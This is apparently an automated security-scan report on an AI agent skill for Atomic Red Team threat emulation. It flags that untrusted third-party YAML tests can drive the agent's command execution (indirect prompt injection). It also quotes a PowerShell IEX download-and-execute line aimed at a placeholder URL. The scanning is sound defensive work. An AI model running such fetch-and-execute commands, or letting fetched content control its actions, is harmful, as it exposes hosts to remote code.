performing-threat-emulation-with-atomic-red-team

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill explicitly instructs cloning and loading YAML test definitions from the public atomic-red-team repository (SKILL.md and references) and scripts/agent.py reads those community-maintained atomics from ./atomic-red-team/atomics and directly uses their executor commands/URLs (via command substitution and subprocess.run), so untrusted third-party content can directly control execution and influence agent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The skill loads atomic test definitions from the external atomic-red-team repo (https://github.com/redcanaryco/atomic-red-team) and the YAML examples include an executor that runs PowerShell IEX (New-Object Net.WebClient).DownloadString('https://example.com/test') — meaning at runtime the agent can fetch and directly execute remote code from the specified URL.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (medium risk: 0.60). The skill directs the agent to execute Atomic Red Team attack simulations on the host (running potentially destructive commands that can change system state and impact security), though it does not explicitly ask for sudo, modify system files, or create users.